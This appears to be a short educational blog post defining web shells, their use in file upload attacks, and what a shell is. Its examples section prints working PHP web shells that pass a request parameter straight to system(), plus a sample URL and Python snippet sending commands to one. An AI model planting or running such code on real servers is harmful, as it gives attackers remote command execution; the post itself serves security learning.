Cyber Security: What is Web Shell

·

2 min read

Definition

A Web Shell is an application or script used to remotely control web servers through a web-based interface. Web shells come in various forms and versions with different functionalities. They are typically written in various web languages such as PHP, ASP, JSP, and more. By using a web shell, users can perform various system tasks, including exploring the web server's file system, executing commands, and accessing databases.

Web Shells in Hacking

Web shells can be utilized by attackers as tools to gain access to web servers for malicious purposes. Malicious scripts can be uploaded and executed on the web server, enabling attackers to execute system commands and take control remotely. In essence, a web shell opens a shell on a website, allowing requests received through the web to be directed towards the operating system.

While legitimate use cases for web shells do exist, due to their potential for misuse, web application developers and administrators need to implement security measures and vulnerability analysis to prevent their misuse.

Web shell attacks are often referred to as file upload attacks.

Cyber Security: What is File Upload

What is a Shell?

A shell is an interface used for interaction between a computer user and an operating system (OS).

Shells provide a text-based environment where users can input and execute commands.

Commonly used shells include Bash (Bourne Again SHell) on Unix and Linux systems, and Command Prompt or PowerShell on Windows systems.

Examples

PHP Web Shell Code

After uploading a PHP file containing the following code and identifying the uploaded file's path, you can insert the parameter "cmd":

<?php echo system($_GET['cmd']);?>
<?php
  if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
  }
?>
example.com/files/webshell.php?cmd=find+../../../../+-name+"flag.txt"
import requests
payload = {
    'cmd': 'whoami'
}
response = requests.get('example.com/files/webshell.php', params=payload)

print(response.text)

Did you find this article valuable?

Support Eunhan's blog by becoming a sponsor. Any amount is appreciated!